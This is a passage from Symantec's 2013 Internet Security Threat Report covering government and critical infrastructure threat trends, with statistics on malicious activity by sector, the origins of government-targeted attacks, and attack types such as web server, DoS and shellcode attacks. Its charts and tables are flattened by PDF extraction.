• Sources of Origin for Government-targeted Attacks<br />
• Attacks by Type: Notable Critical Infrastructure Sectors
p. 153<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
Malicious Activity by Critical Infrastructure Sector<br />
Background<br />
This metric indicates the level to which government and critical<br />
infrastructure organizations may have been compromised and<br />
are being used by attackers as launching pads for malicious<br />
activity. These attacks could potentially expose sensitive and<br />
confidential information, which could have serious ramifications<br />
for government and critical infrastructure organizations. Such<br />
information could be used for strategic purposes in the case of<br />
state- or group-sponsored attacks, especially since attackers who<br />
use compromised computers for malicious activity can mask<br />
their actual location.<br />
Methodology<br />
This metric evaluates the amount of malicious activity<br />
originating from computers and networks that are known to<br />
belong to government and critical infrastructure sectors. To<br />
measure this, Symantec cross-references the IP addresses<br />
of known malicious computers with standard industrial<br />
classification (SIC 1 ) codes that are assigned to each industry and<br />
provided by a third-party service. 2 Symantec has compiled data<br />
on numerous malicious activities that were detected originating<br />
from the IP address space of these organizations. These<br />
activities include bot-infected computers, phishing hosts,<br />
spam zombies, and network attack origins.<br />
Data<br />
Figure e.1 Malicious Activity by Critical Infrastructure Sector<br />
Source: Symantec<br />
Industry Sector<br />
% of CIP Source<br />
Activity<br />
Financial services 72.2% 9.6%<br />
Manufacturing 16.0% 71.5%<br />
Biotech / Pharmaceutical 4.7% 6.0%<br />
Government 2.2% 1.7%<br />
Aerospace 1.9% 7.3%<br />
Government - national 1.2% 0.8%<br />
Government - state 0.9% 0.8%<br />
utilities/energy 0.3% 0.3%<br />
<strong>internet</strong> service Provider 0.3% 1.7%<br />
telecommunications 0.1% 0.1%<br />
Government - Local
p. 154<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
Sources of Origin for Government-targeted Attacks<br />
Background<br />
Attacks targeting government organizations may serve as a<br />
means of expressing disagreement with policies and programs<br />
that the government has developed and implemented. Such<br />
attacks are likely to be carried out for a variety of reasons,<br />
including blocking access to government Internet-based<br />
resources, gaining access to potentially sensitive information,<br />
and discrediting the government itself. In addition, attacks<br />
may be motivated by espionage and attempts to steal<br />
government-classified information. These attacks may result<br />
in the disruption of critical services, as with DoS attacks,<br />
or the exposure of highly sensitive information. An attack<br />
that disrupts the availability of a high-profile government<br />
organization website will get much wider notice than one<br />
that takes a single user offline. In addition, malicious code<br />
attacks targeting governments can be motivated by profit<br />
because governments store considerable amounts of personal<br />
identification data that could be used for fraudulent purposes,<br />
such as identity theft. Personal data can include names,<br />
addresses, government-issued identification numbers, and bank<br />
account credentials, all of which can be effectively exploited for<br />
fraud by attackers. Government databases also store information<br />
that could attract politically motivated attacks, including critical<br />
infrastructure information and other sensitive intelligence. In<br />
February, several attacks targeting a government organization<br />
consisted of spoofed emails sent to U.S. military officials<br />
with subjects like “U.S.Air Force Procurement Plan 2012” and<br />
“[UNCLASSIFIED]2012 U.S.Army orders for weapons.” This<br />
prompted recipients to click on a link, which would download<br />
malicious code in an attempt to steal confidential information. 3<br />
Methodology<br />
This metric will assess the top sources of origin for governmenttargeted<br />
attacks by determining the location of computers from<br />
which the attack occurred. It should be noted that attackers<br />
often attempt to obscure their tracks by redirecting attacks<br />
through one or more servers that may be located anywhere in<br />
the world; thus, the attacker may be located somewhere other<br />
than from where the attacks appear to originate.<br />
Data<br />
Figure e.2 Sources of Origin for Government-targeted Attacks<br />
Source: Symantec<br />
Row Labels<br />
% of Source<br />
Activity<br />
united states 73.67% 16.73%<br />
china 11.88% 54.56%<br />
united Kingdom 2.23% 1.98%<br />
netherlands 2.17% 3.28%<br />
russia 2.10% 7.22%<br />
taiwan 1.92% 4.92%<br />
Brazil 1.68% 5.89%<br />
Germany 1.54% 2.47%<br />
Korea, south 1.41% 1.70%<br />
France 1.40% 1.25%<br />
Commentary<br />
% of Source IP<br />
Addresses<br />
• The United States and China were the top two sources of<br />
origin for attacks that targeted the Government sector in<br />
2012.<br />
• This could be a consequence of having large numbers of<br />
insecure systems in the United States and China, which may<br />
be used for staging an attack.
p. 155<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
Attacks by Type: Notable Critical Infrastructure Sectors<br />
Background<br />
This section of the Symantec Government Internet Security<br />
Threat Report focuses on the types of attacks detected by<br />
sensors deployed in notable critical infrastructure sectors.<br />
Government and critical infrastructure organizations are the<br />
target of a wide variety of attack types. The ability to identify<br />
attacks by type assists <strong>security</strong> administrators in evaluating<br />
which assets may be targeted and may assist them in securing<br />
those assets receiving a disproportionate number of attacks.<br />
The following sectors will be discussed in detail:<br />
• Government<br />
• Biotech/Pharmaceutical<br />
• Healthcare<br />
• Financial Services<br />
• Transportation<br />
• Telecommunications<br />
• Utilities<br />
Methodology<br />
The following types of attacks are considered for this metric:<br />
Attacks on Web Servers: Web servers facilitate a variety of<br />
services for government and critical infrastructure sectors, such<br />
as hosting publicly available information, customer support<br />
portals, and online stores. Some Web servers also host remotely<br />
accessible interfaces that employees use to perform routine,<br />
job-related tasks from remote locations. Furthermore, a Web<br />
server may be a portal to an organization’s internal network and<br />
database systems.<br />
Attacks on Web Browsers: Web browsers are exposed to a<br />
greater amount of potentially untrusted or hostile content<br />
than most other applications. As the Internet has become<br />
commonplace among business and leisure activities, there is<br />
an increased reliance on browsers and their plug-ins. Attacks<br />
on Web browsers can originate from malicious websites as well<br />
as legitimate websites that have been compromised to serve<br />
malicious content. Browsers can also facilitate client-side<br />
attacks because of their use of plug-ins and other applications<br />
in handling potentially malicious content served from the Web,<br />
such as compromised documents and media files.<br />
Attacks on SMTP (Simple Mail Transfer Protocol): SMTP is<br />
designed to facilitate the delivery of email messages across<br />
the Internet. Email servers using SMTP as a service are likely<br />
targeted by attackers because external access is required to<br />
deliver email. While most services can be blocked by a firewall<br />
to protect against external attacks and allow access only to<br />
trusted users and entities, for email to function effectively<br />
for organizations, it has to be available both internally and<br />
externally to other email servers. The necessity of allowing both<br />
internal and external access increases the probability that a<br />
successful attack will improve the attackers’ chances of gaining<br />
access to the network.<br />
Denial-of-Service (DoS) Attacks: DoS attacks are a threat to<br />
government and critical infrastructures because the purpose<br />
of such attacks is to disrupt the availability of high-profile<br />
websites or other network services and make them inaccessible<br />
to users and employees. A successful DoS attack could result<br />
in the disruption of internal and external communications,<br />
making it practically impossible for employees and users to<br />
access potentially critical information. Because these attacks<br />
often receive greater exposure than those that take a single user<br />
offline, especially for high-profile government websites, they<br />
could also result in damage to the organization’s reputation.<br />
A successful DoS attack on a government network could also<br />
severely undermine confidence in government competence and<br />
impair the defense and protection of government networks.<br />
Backscatter: Generally, backscatter is considered to be a type of<br />
Internet background noise, which is typically ignored. While not<br />
a direct attack, backscatter is evidence that a DoS attack against<br />
another server on the Internet is taking place and is making use<br />
of spoofed IP addresses. When one of these spoofed IP addresses<br />
matches the address of a Symantec sensor, any error messages<br />
that the attacked server sends to the spoofed address will be<br />
detected by a Symantec sensor as backscatter.<br />
Shellcode/Exploit Attacks: Shellcode is a small piece of code<br />
used as the payload in the exploitation of a vulnerability. An<br />
attacker can exploit a vulnerability to gain access to a system,<br />
inject this code, and use a command shell to take control of a<br />
compromised machine. By remotely controlling a compromised<br />
system, an attacker can gain access to an organization’s network<br />
and, from there, perpetrate additional attacks. Moreover, this<br />
type of attack can monopolize valuable resources that may be<br />
critical to government operations.
p. 156<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
Data and Commentary<br />
Figure e.3 Attacks by Type – Overall Government and Critical Infrastructure Organizations<br />
Source: Symantec<br />
Web (server)<br />
79%<br />
6% DoS<br />
5% Shellcode/Exploit<br />
7% P2P<br />
2% Web (browser)<br />
1% SMTP (email)<br />
• Web server attacks were the most common type of attack for<br />
government and critical infrastructure: In 2012, the most<br />
common attack type seen by all sensors in the government<br />
and critical infrastructure sectors related to attacks on Web<br />
servers and accounted for 78.48 percent of all attacks.<br />
• P2P attacks were the second-most common type of attack<br />
for government and critical infrastructure, accounting<br />
for 7.21 percent of attacks. P2P attacks are comprised of<br />
general ones such as DoS, Man-in-the-middle and Worm<br />
propagation attacks, and specific ones such as Rational<br />
attacks, file poisoning, etc.<br />
• DoS attacks are often associated with social and political<br />
protests, since they are intended to render a site<br />
inaccessible to legitimate users of those services. Man-inthe-middle<br />
attacks are where the attacker inserts himself<br />
undetected between two nodes. He can then choose to stay<br />
undetected and spy on the communication or more actively<br />
manipulate the communication.<br />
p. 157<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
Figure e.4 Attacks by Type – Notable Critical Infrastructure Sectors<br />
Source: Symantec<br />
Government<br />
Shellcode<br />
/Exploit<br />
51%<br />
Financial Services<br />
P2P<br />
20%<br />
Transportation<br />
Utilities<br />
Web<br />
(server)<br />
86%<br />
DoS<br />
81%<br />
Shellcode<br />
/Exploit<br />
21%<br />
Web<br />
(server)<br />
27%<br />
6% DoS<br />
23% SMTP (email)<br />
14% Web (server)<br />
5% DoS<br />
13% DoS<br />
1% Shellcode/Exploit<br />
p. 158<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
• The Financial Services and Transportation sectors were<br />
predominantly targeted by Web server attacks in 2012.<br />
These two sectors contribute to the majority of Web server<br />
attacks seen in critical infrastructure sectors overall. This<br />
may indicate that attackers were specifically targeting these<br />
sectors and attempting to disrupt Web services, which are<br />
the backbone of these sectors.<br />
• Shellcode/Exploit attacks have become the most common<br />
for the government sector and healthcare. A shellcode is a<br />
small piece of code used as the payload in the exploitation<br />
of a software vulnerability. It is called “shellcode” because<br />
it typically starts a command shell from which the attacker<br />
can control the compromised machine. Shellcode can<br />
either be local or remote, depending on whether it gives an<br />
attacker control over the machine it runs on (local) or over<br />
another machine through a network (remote).<br />
• DoS attacks predominate Biotech, Telecommunications<br />
and Utilities sectors, attempting to disrupt services and<br />
communications within them.<br />
Government Threat Activity Endnotes<br />
01 SIC codes are the standard industry codes that are used by the United States Securities and Exchange Commission to identify<br />
organizations belonging to each industry. For more information, please see http://www.sec.gov/.<br />
02 See http://www.digitalenvoy.net/.<br />
03 See http://www.huffingtonpost.com/2011/01/05/white-house-christmas-email_n_804547.html.
p. 159<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
About Symantec<br />
Symantec protects the world’s information and is a global leader in <strong>security</strong>, backup, and<br />
availability solutions. Our innovative products and services protect people and information<br />
in any environment—from the smallest mobile device to the enterprise data center to cloudbased<br />
systems. Our world-renowned expertise in protecting data, identities, and interactions<br />
gives our customers confidence in a connected world. More information is available at<br />
www.symantec.com or by connecting with Symantec at go.symantec.com/socialmedia.<br />
More Information<br />
• Symantec.cloud Global Threats: http://www.symanteccloud.com/en/gb/globalthreats/.<br />
• Symantec Security Response: http://www.symantec.com/<strong>security</strong>_response/.<br />
• Internet Security Threat Report Resource Page: http://www.symantec.com/threatreport/.<br />
• Norton Threat Explorer: http://us.norton.com/<strong>security</strong>_response/threatexplorer/.<br />
• Norton Cybercrime Index: http://us.norton.com/cybercrimeindex/.
For specific country offices and contact numbers,<br />
please visit our website.<br />
For product information in the u.s.,<br />
call toll-free 1 (800) 745 6054.<br />
Symantec Corporation World headquarters<br />
350 ellis street<br />
Mountain View, cA 94043 usA<br />
+1 (650) 527 8000<br />
1 (800) 721 3934<br />
www.symantec.com<br />
Copyright © <strong>2013</strong> Symantec Corporation.<br />
All rights reserved. Symantec, the Symantec Logo,<br />
and the Checkmark Logo are trademarks or registered<br />
trademarks of Symantec Corporation or its affiliates in<br />
the U.S. and other countries. Other names may<br />
be trademarks of their respective owners.<br />
03/13 21284431<br />
confidence in a connected world.